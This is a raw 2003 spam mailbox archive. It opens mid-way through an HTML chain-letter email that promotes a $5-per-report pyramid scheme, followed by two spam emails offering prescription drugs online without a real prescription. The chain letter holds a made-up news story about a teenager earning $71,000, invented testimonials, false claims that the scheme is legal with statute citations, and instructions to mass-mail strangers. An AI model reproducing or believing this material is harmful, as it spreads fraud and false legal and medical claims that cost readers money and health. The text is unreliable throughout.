Future Five Minutes And Read This Email</font></font></font></u></b>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>It W=
ill
Change Your Life!</font></font></font></u></b>
<p><b><i><font face=3D"Arial">A One Time Investment Of $25 Plus This Simpl=
e
Technology</font></i></b>
<br><b><i><font face=3D"Arial">Could Make You Financially Secure For Life!=
</font></i></b></center>

<blockquote>
<center><font face=3D"Arial">Just Because <b>This&nbsp; Is Easy</b> doesn'=
t
mean it's not <b>Honest</b>, or <b>Real Business</b>.&nbsp; Keep&nbsp;</fo=
nt>
<br><font face=3D"Arial"><b>Working Hard</b> or Learn to <b>Work Smart</b>=
.
What do you think Successful People Do?</font></center>

<blockquote><font face=3D"Arial">This is a completely documented method to=

Get Wealthy and Anyone regardless of Age, Race, State of Health, Country
of origin, or Financial Standing can participate. No Education or Special
Experience is needed. Within the next two weeks you could be well on your
way to a $500,000.00 income. Imagine being able to make over a half millio=
n
dollars every 4 to 5 months from your home.</font></blockquote>

<center><b><font face=3D"Arial">THANK'S TO THE COMPUTER AGE AND THE INTERN=
ET</font></b>
<p><b><font face=3D"Arial"><font size=3D+1>AS SEEN ON NATIONAL TV:</font><=
/font></b></center>

<center><b><font face=3D"Arial">PARENTS OF 15 - YEAR OLD - FIND $71,000 CA=
SH
HIDDEN IN HIS CLOSET!</font></b></center>

<blockquote><font face=3D"Arial">Does this headline look familiar? Of cour=
se
it does. You most likely have just seen this story recently featured on
a major nightly news program (USA). And reported elsewhere in the world.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labelled piles.</font>
<p><font face=3D"Arial">"My first thought was that he had robbed a bank",
says the 41-year-old woman, "There was over $71,000 Dollars in that bag
-- that's more than my husband earns in a year".</font>
<p><font face=3D"Arial">The woman immediately called her husband at the ca=
r-dealership
where he worked to tell him what she had discovered. He came home right
away, and they drove together to the boys school, and picked him up. Littl=
e
did they suspect that where the money came from, was more shocking than
actually finding it in the closet.</font>
<p><font face=3D"Arial">As it turns out, the boy had been sending out, via=

E-mail, a type of "Report" to E-mail addresses that he obtained off the
Internet. Everyday after school for the past 2 months, he had been doing
this right on his computer in his bedroom.</font>
<p><font face=3D"Arial">"I just got the E-mail one day and I figured what
the heck, I put my name on it like the instructions said and I started
sending it out", says the clever 15-year-old.</font>
<p><font face=3D"Arial">The E-mail letter listed 5 addresses and contained=

instructions to send one $5 dollar bill to each person on the list, then
delete the address at the bottom and move the others addresses Down , and
finally to add your name to the top of the list.</font>
<p><font face=3D"Arial">The letter goes on to state that you would receive=

Several Thousand Dollars in Five-Dollar Bills within 2 weeks if you sent
out the letter with your name at the top of the 5-address list. "I get
junk E-mail all the time, and really did not think it was going to work",
the boy continues.</font>
<p><font face=3D"Arial">Within the first few days of sending out the E-mai=
l,
the Post Office Box that his parents had gotten him for his video-game
magazine subscriptions began to fill up with not with magazines, but envel=
opes
containing $5 Bills.</font>
<p><font face=3D"Arial">"About a week later I rode [my bike] down to the
post office and my box had 1 magazine and about 300 envelops stuffed in
it. There was also a yellow slip that said I had to go up to the [post
office] counter. I thought I was in trouble or something (laughs)". He
goes on, "I went up to the counter and they had a whole box of more mail
for me. I had to ride back home and empty out my backpack because I could
not carry it all". Over the next few weeks, the boy continued sending out
the E-mail."The money just kept coming in and I just kept sorting it and
stashing it in the closet, barely had time for my homework".He had also
been riding his bike to several of the banks in his area and exchanging
the $5 bills for twenties, fifties and hundreds.</font>
<p><font face=3D"Arial">"I didn't want the banks to get suspicious so I ke=
pt
riding to different banks with like five thousand at a time in my backpack=
.
I would usually tell the lady at the bank counter that my dad had sent
me in to exchange the money and he was outside waiting for me.One time
the lady gave me a really strange look and told me that she would not be
able to do it for me and my dad would have to come in and do it, but I
just rode to the next bank down the street (laughs)." Surprisingly, the
boy did not have any reason to be afraid.The reporting news team examined
and investigated the so-called "chain-letter" the boy was sending out and
found that it was not a chain-letter at all.In fact, it was completely
legal according to US Postal and Lottery Laws, Title 18, Section 1302 and
1341, or Title 18, Section 3005 in the US code, also in the code of federa=
l
regulations, Volume 16, Sections 255 and 436, which state a product or
service must be exchanged for money received.</font>
<p><font face=3D"Arial">Every five-dollar bill that he received contained
a little note that read, "Please send me report number XYX".This simple
note made the letter legal because he was exchanging a service (A Report
on how-to) for a five-dollar fee.</font>
<p><font face=3D"Arial">[This is the end of the media release. If you woul=
d
like to understand how the system works and get your $71,000 plus - please=

continue reading. What appears below is what the 15 year old was sending
out on the net - YOU CAN USE IT TOO - just follow the simple instructions]=
</font>
<br>&nbsp;
<br>&nbsp;
<p><b><font face=3D"Arial">BE AN INTERNET MILLIONAIRE LIKE OTHERS&nbsp; WI=
THIN
A YEAR!!!</font></b>
<p><font face=3D"Arial"><b>Before you say ''Bull'', please read the follow=
ing.</b>
This is the letter you have been hearing about on the news lately. Due
to the popularity of this letter on the Internet, a national weekly news
program recently devoted an entire show to the investigation of this progr=
am
described below, to see if it really can make people money. The show also
investigated whether or not the program was legal.</font>
<p><font face=3D"Arial">Their findings proved once and for all that there
are ''absolutely NO Laws prohibiting the participation in the program and
if people can "follow the simple instruction" they are bound to make some
mega bucks with only $25 out of pocket cost''.</font>
<p><font face=3D"Arial">DUE TO THE RECENT INCREASE OF POPULARITY &amp; RES=
PECT
THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.</font=
>
<p><font face=3D"Arial">This is what one had to say:&nbsp;</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">''Thanks to th=
is
profitable opportunity". I was approached many times before but each time
I passed on it. I am so glad I finally joined just to see what one could
expect in return for the minimal effort and money required. To my astonish=
ment,
I received a total $ 610,470.00 in 21 weeks, with money still coming in''.=
</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>Pam =
Hedland</font></font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>For=
t Lee,
New Jersey.</font></font></font></i></b></blockquote>
</blockquote>

<hr width=3D"600" noshade>
<blockquote><font face=3D"Arial">Another said:</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"This program =
has
been around for a long time but I never believed in it. But one day when
I received this again in the mail I decided to gamble my $25 on it. I foll=
owed
the simple instructions and Wa-laa ..... 3 weeks later the money started
to come in. First month I only made $240.00 but the next 2 months after
that I made a total of $290,000.00. So far, in the past 8 months by re-ent=
ering
the program, I have made over $710,000.00 and I am playing it again. The
key to success in this program is to follow the simple steps and NOT chang=
e
anything."</font></font></i></blockquote>

<p><br><font face=3D"Arial">More testimonials later but first...</font></b=
lockquote>
</blockquote>

<center>
<p><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENCE</font>=
</b></center>

<p>
<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to
make at least $500,000 every 4 to 5 months easily and</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">comfortably, please re=
ad
the following...THEN READ IT AGAIN and AGAIN !!!</font></font></b></center=
>

<hr width=3D"85%">
<center>
<p><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fon=
t></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>

<blockquote>
<blockquote><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>=

<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font></blockquote>
</blockquote>

<center>
<p><br><b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>=

<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You will need all 5 reports so that you
can save them on your computer and resell them.</font>
<center>
<p><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>

<p><font face=3D"Arial">Within a few days <b>you will receive, via e-mail,=

each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<p><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will loose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!&nbsp;</u></b=
></font></blockquote>

<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b>
<p><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such and=

you will be VERY profitable in a short period of time</font></font></i></b=
></center>
</blockquote>

<blockquote>
<blockquote><font face=3D"Arial">After you have ordered all 5 reports, tak=
e
this advertisement and REMOVE the name &amp; address of the person in REPO=
RT
# 5. This person has made it through the cycle and is no doubt counting
their fortune. Email them and ask that's what I always did.</font><font fa=
ce=3D"Arial">Move
the name &amp; address in REPORT # 4 down TO REPORT # 5.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 3 down TO REPORT # 4.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 2 down TO REPORT # 3.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 1 down TO REPORT # 2</font><font
face=3D=
"Arial">Insert
YOUR name &amp; address in the REPORT # 1 Position.</font></blockquote>

<center>
<p><br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &a=
mp;
address <b>ACCURATELY</b></font>
<br><font face=3D"Arial">(Just cut and paste! This is critical to <b>YOUR
</b>success.</font></center>
</blockquote>

<center><font face=3D"Arial">Take this entire letter, with the modified li=
st
of names, and save it on your computer.</font>
<p><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cente=
r>

<blockquote>
<blockquote><font face=3D"Arial"><b>Save this on a disk as well just in ca=
se
if you loose any data</b>. To assist you with marketing your business on
the internet, the 5 reports you purchase will provide you with invaluable
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY=
</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Let's say that you decide to start small,=

just to see how it goes, and we will assume You and those involved send
out only 5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NU=
MBERS
DO NOT LIE</font></font></font></b></center>

<blockquote>
<blockquote><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-=
1>GET
A PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
MATTER HOW YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did
it was $55,000 in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 2: BY PLACING FREE ADS ON THE INT=
ERNET</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Advertising on the net is very, very inex=
pensive
and there are hundreds of FREE places to advertise. Placing a lot of free
ads on the Internet will easily get a larger response. We strongly suggest=

you start with Method # 1 and add METHOD #2 as you go along. For every
$5 you receive, all you must do is e-mail them the Report they ordered.
That's it. Always provide same day service on all orders.</font>
<p><font face=3D"Arial">This will guarantee that the e-mail they send out,=

with your name and address on it, will be prompt because they can not adve=
rtise
until they receive the report.</font>
<p><font face=3D"Arial">The reason for the "cash" is not because this is
illegal or somehow "wrong". It is simply about time. Time for checks or
credit cards to be cleared or approved, etc. Concealing it is simply so
no one can SEE there is money in the envelope and steal it before it gets
to you.</font></blockquote>

<center><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME=

ONLY</b>.</font></center>

<blockquote><b><font face=3D"Arial">Notes:</font></b>
<p><font face=3D"Arial">Always send $5 cash (U.S. CURRENCY) for each Repor=
t.
Checks NOT accepted. Make sure the cash is concealed by wrapping it in
at least 2 sheets of paper or foil will also work. On one of those sheets
of paper, write the NUMBER &amp; the NAME of the Report you are ordering,
YOUR E-MAIL ADDRESS and your name and postal address.</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></=
font></b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<br>&nbsp;
<center><table WIDTH=3D"80%" class=3D"center" >
<tr>
<td WIDTH=3D"30%" BGCOLOR=3D"#009900" class=3D"left">&nbsp;</td>

<td>
<br><b><font face=3D"Arial">REPORT #1:&nbsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<blockquote><b><font face=3D"Arial,Helvetica"><font size=3D-1>D. Barbee</f=
ont></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>P.O. Box 163</font><=
/font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Danville, AL 35619</=
font></font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Frank G.</font></font>=
</b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 185</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Middlefield, Ohio  44062-9998<=
/font></font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>J. Haviaras</font></fo=
nt></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 22449</font></font></=
b>
<br><b><font face=3D"Arial"><font size=3D-1>Lake Buena Vista, FL 32830</fo=
nt></font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>C. Bernerd</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 319</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:&nbsp;</f=
ont></font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Mike W.</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 297</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b></blockquote>
</td>
</tr>
</table></center>

<blockquote>
<blockquote>
<center><b><font face=3D"Arial"><font size=3D+0>There are currently more t=
han
570,000,000 people online worldwide!</font></font></b></center>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$=
$$$$$
YOUR SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>

<blockquote><font face=3D"Arial">Follow these guidelines to guarantee your=

success:</font>
<p><font face=3D"Arial">If you do not receive at least 10 orders for Repor=
t
#1 within 2 weeks, continue sending e-mails until you do.</font>
<p><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks af=
ter
that you should receive 100 orders or more for REPORT # 2. If you did not,=

continue advertising or sending e-mails until you do.</font>
<p><font face=3D"Arial">**Once you have received 100 or more orders for Re=
port#
2, YOU CAN RELAX, because the system is already working for you, and the
cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Every time
your name is moved down on the list, you are placed in front of a Differen=
t
report.</font>
<p><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching wh=
ich
report people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME
SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There
is NO LIMIT to the income you can generate from this business!!!</font></b=
lockquote>
</blockquote>

<center><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF=

THIS PROGRAM:</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You have just received information that
can give you financial freedom for the rest of your life, with NO RISK
and JUST A LITTLE BIT OF EFFORT. You can make more money in the next few
weeks and months than you have ever imagined. Follow the program EXACTLY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity to become financiall=
y
independent. IT IS UP TO YOU NOW!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">MORE TESTIMONIALS</font></b></center>

<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"My name is Mi=
tchell.
My wife, Jody and I live in Chicago. I am an accountant with a major U.S.C=
orporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Mitchell Wolf M.D.,<=
/font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Chicago, Illinois</=
font></font></i></b></blockquote>
</blockquote>

<center>
<hr width=3D"85%"></center>

<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"Not being the=

gambling type, it took me several weeks to make up my mind to participate
in this plan. But conservative as I am, I decided that the initial investm=
ent
was so little that there was just no way that I wouldn't get enough orders=

to at least get my money back. I was surprised when I found my medium size=

post office box crammed with orders. I made $319,210.00 in the first 12
weeks. The nice thing about this deal is that it does not matter where
people live. There simply isn't a better investment with a faster return
and so big".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Dan Sondstrom,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Alberta, Canada</fo=
nt></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"I had receive=
d
this program before. I deleted it, but later I wondered if I should have
given it a try. Of course, I had no idea who to contact to get another
copy, so I had to wait until I was e-mailed again by someone else........1=
1
months passed then it luckily came again...... I did not delete this one!
I made more than $490,000 on my first try and all the money came within
22 weeks".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Susan De Suza,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">New York, N.Y.</fon=
t></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"It really is =
a
great opportunity to make relatively easy money with little cost to you.
I followed the simple instructions carefully and within 10 days the money
started to come in. My first month I made $ 20,560.00 and by the end of
third month my total cash count was $ 362,840.00. Life is beautiful, Thanx=

to the internet".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Fred Dellaca,</font>=
</font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Westport, New Zeala=
nd</font></font></i></b></blockquote>

<hr width=3D"85%"></blockquote>

<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<p><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></font=
></b></center>
</blockquote>

<center><i><font face=3D"Arial"><font size=3D-1>If you have any questions =
as
to the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<p>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

<div class=3D"ItalicBold"></div>

</body>
</html>
p tnzoau 
ix
szjrgpxs
gnkvgq utbjdqpiosa
m ohvqvqzngol irxll  w

--8_61D0F_D.2_964--


From amc2tbjb@hotmail.com Wed Sep  3 17:17:52 2003
Return-Path: <amc2tbjb@hotmail.com>
Received: from 160.36.58.108 ([211.91.178.194])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h83LHiRY021164;
	Wed, 3 Sep 2003 17:17:47 -0400 (EDT)
Received: from [252.146.121.177] by 160.36.58.108 id <1677646-40442>; Thu, 04 Sep 2003 07:07:40 -0400
Message-ID: <j$-$40os62t9@rgdi2y2u.u1.v1>
From: "Ivy Britt" <amc2tbjb@hotmail.com>
Reply-To: "Ivy Britt" <amc2tbjb@hotmail.com>
To: <199902071506.kaa20808@netlib2.cs.utk.edu>, <anon@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Prescriptions written and filled online!   xy zxnhku
Date: Thu, 04 Sep 03 07:07:40 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="AC_9_D9ECAC1EFBAD7"
X-Priority: 1
X-MSMail-Priority: High


--AC_9_D9ECAC1EFBAD7
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><FONT  SIZE=3D3 PTSIZE=3D12><B>Get ANY Prescription DRUG You WANT!!<=
BR>OUR US Doctors will Write YOU a Prescription for FREE!<BR>You get it NE=
XTDAY via FedEx!!</FONT><FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D=
"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=
=3D"Arial" LANG=3D"0"></B><BR></FONT><FONT  COLOR=3D"#0000ff" BACK=3D"#fff=
fff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D4 PTSIZE=3D14 FAMILY=3D"SA=
NSSERIF" FACE=3D"Arial" LANG=3D"0"><B><A HREF=3D"http://www.dpils.biz/vpr6=
334/">LOOK_HERE</A></B></FONT><FONT COLOR=3D"#000000" BACK=3D"#ffffff" sty=
le=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF"=
 FACE=3D"Arial" LANG=3D"0"></B><BR><BR><BR><BR></FONT></HTML>=
eeb db  zk p vg

--AC_9_D9ECAC1EFBAD7--


From ulhypzc972@concentric.com Thu Sep  4 03:46:54 2003
Return-Path: <ulhypzc972@concentric.com>
Received: from 160.36.58.108 ([211.251.137.130])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h847knRY028291;
	Thu, 4 Sep 2003 03:46:51 -0400 (EDT)
Received: from [183.132.2.41] by 160.36.58.108 with ESMTP id 03396623; Thu, 04 Sep 2003 23:43:42 +0200
Message-ID: <0qngt--qilr--l$27--m-jm4y1okg@kp7yd.xsl.yuq9>
From: "Robyn Ferreira" <ulhypzc972@concentric.com>
Reply-To: "Robyn Ferreira" <ulhypzc972@concentric.com>
To: <199902071506.kaa20808@netlib2.cs.utk.edu>, <anon@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>
Subject: EVER WANTED REAL DIET PILLS??                                         >>                              .	 a gwwlfhf wrhzigswuj
Date: Thu, 04 Sep 03 23:43:42 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3_E.27..61C.DE9CE49_123_"
X-Priority: 1
X-MSMail-Priority: High


--3_E.27..61C.DE9CE49_123_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><FONT  SIZE=3D3 PTSIZE=3D12><B>Get ANY Prescription DRUG You WANT!!<=
BR>OUR US Doctors will Write YOU a Prescription for FREE!<BR>You get it NE=
XTDAY via FedEx!!</FONT><FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D=
"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=
=3D"Arial" LANG=3D"0"></B><BR></FONT><FONT  COLOR=3D"#0000ff" BACK=3D"#fff=
fff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D4 PTSIZE=3D14 FAMILY=3D"SA=
NSSERIF" FACE=3D"Arial" LANG=3D"0"><B><A HREF=3D"http://www.dpils.biz/vpr6=
334/">LOOK_HERE</A></B></FONT><FONT COLOR=3D"#000000" BACK=3D"#ffffff" sty=
le=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF"=
 FACE=3D"Arial" LANG=3D"0"></B><BR><BR><BR><BR></FONT></HTML>=
zuzvqag 
mrmq spdags

--3_E.27..61C.DE9CE49_123_--


From 312gnao@concentric.com Thu Sep  4 20:49:53 2003
Return-Path: <312gnao@concentric.com>
Received: from 160.36.58.108 ([218.12.34.234])
